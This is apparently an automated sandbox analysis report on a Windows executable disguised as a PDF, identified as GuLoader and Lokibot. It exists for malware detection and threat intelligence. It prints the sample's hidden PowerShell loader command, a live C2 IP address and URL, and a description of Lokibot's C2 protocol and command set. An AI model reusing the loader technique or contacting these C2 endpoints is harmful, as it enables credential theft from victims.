Edit tour

Windows Analysis Report
PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Overview

General Information

Sample name:	PTFE Coated Butterfly Valve Picture#U00b7pdf.exe renamed because original name is a hash value
Original sample name:	PTFE Coated Butterfly Valve Picturepdf.exe
Analysis ID:	1467418
MD5:	33bc360990c66beea144ae48d17504a6
SHA1:	7dfb4c70ef7d73c8618ce8799d414ba3c3fe9684
SHA256:	49274bd66a4d53ca004a0a58c15496292a323f229b9712e5f3994af5c307bc0a
Tags:	exe
Infos:

Detection

GuLoader, Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected GuLoader

Yara detected Lokibot

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Powershell drops PE file

Sample uses process hollowing technique

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

PTFE Coated Butterfly Valve Picture#U00b7pdf.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe" MD5: 33BC360990C66BEEA144AE48D17504A6)

powershell.exe (PID: 5316 cmdline: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Slringsnettets.exe (PID: 2212 cmdline: "C:\Users\user\AppData\Local\Temp\Slringsnettets.exe" MD5: 33BC360990C66BEEA144AE48D17504A6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2902321188.00000000032F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000001.00000002.2150551210.0000000009A8F000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Slringsnettets.exe PID: 2212	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: Slringsnettets.exe PID: 2212	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", CommandLine: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe", ParentImage: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, ParentProcessId: 6528, ParentProcessName: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", ProcessId: 5316, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", CommandLine: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe", ParentImage: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, ParentProcessId: 6528, ParentProcessName: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", ProcessId: 5316, ProcessName: powershell.exe

Snort Signatures

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:51.476463
SID:	2024312
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:09.594874
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:58.321813
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:58.321813
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:51.476463
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:19.733205
SID:	2024313
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:29.621058
SID:	2024313
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:39.706240
SID:	2024313
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:03.170213
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:09.594874
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:29.621058
SID:	2021641
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:59.644126
SID:	2024313
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:55.668996
SID:	2025381
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:13.686997
SID:	2025381
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:42.854659
SID:	2025381
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:19.733205
SID:	2021641
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:26.698638
SID:	2025381
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:36.450860
SID:	2025381
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:42.854659
SID:	2021641
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:06.423937
SID:	2025381
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:42.854659
SID:	2024313
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:24:04.224134
SID:	2024313
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:24:04.224134
SID:	2021641
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:45.825819
SID:	2025381
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:52.576198
SID:	2025381
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:46.615235
SID:	2021641
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:46.615235
SID:	2024312
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:33.104567
SID:	2025381
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:59.644126
SID:	2021641
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:54.945889
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:39.706240
SID:	2021641
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:03.170213
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:03.170213
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:09.594874
SID:	2025381
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:22.867673
SID:	2024313
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:22.867673
SID:	2021641
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:49.262816
SID:	2025381
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:59.644126
SID:	2025381
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:55.668996
SID:	2021641
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:29.621058
SID:	2025381
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:58.321813
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:19.733205
SID:	2025381
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:51.476463
SID:	2025381
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:16.685865
SID:	2021641
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:06.423937
SID:	2021641
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:06.423937
SID:	2024313
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:45.825819
SID:	2024313
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:26.698638
SID:	2024313
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:26.698638
SID:	2021641
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:55.668996
SID:	2024313
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:45.825819
SID:	2021641
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:16.685865
SID:	2024313
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:36.450860
SID:	2024313
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:36.450860
SID:	2021641
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:46.615235
SID:	2025381
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:33.104567
SID:	2021641
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:16.685865
SID:	2025381
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:33.104567
SID:	2024313
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:13.686997
SID:	2024313
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:13.686997
SID:	2021641
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:24:04.224134
SID:	2025381
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:22.867673
SID:	2025381
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:54.945889
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:22:54.945889
SID:	2024313
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:52.576198
SID:	2021641
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:49.262816
SID:	2024313
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:49.262816
SID:	2021641
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:52.576198
SID:	2024313
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.61.136.239

Timestamp:	07/04/24-08:23:39.706240
SID:	2025381
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://45.61.136.239/index.php/posts.php?file=1951649854775

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://45.61.136.239/index.php/wp-json/	Virustotal: Detection: 7%	Perma Link
Source: http://45.61.136.239/index.php/feed/	Virustotal: Detection: 7%	Perma Link
Source: http://45.61.136.239/index.php/comments/feed/	Virustotal: Detection: 7%	Perma Link
Source: http://45.61.136.239/index.php/posts.php?file=1951649854775	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for dropped file

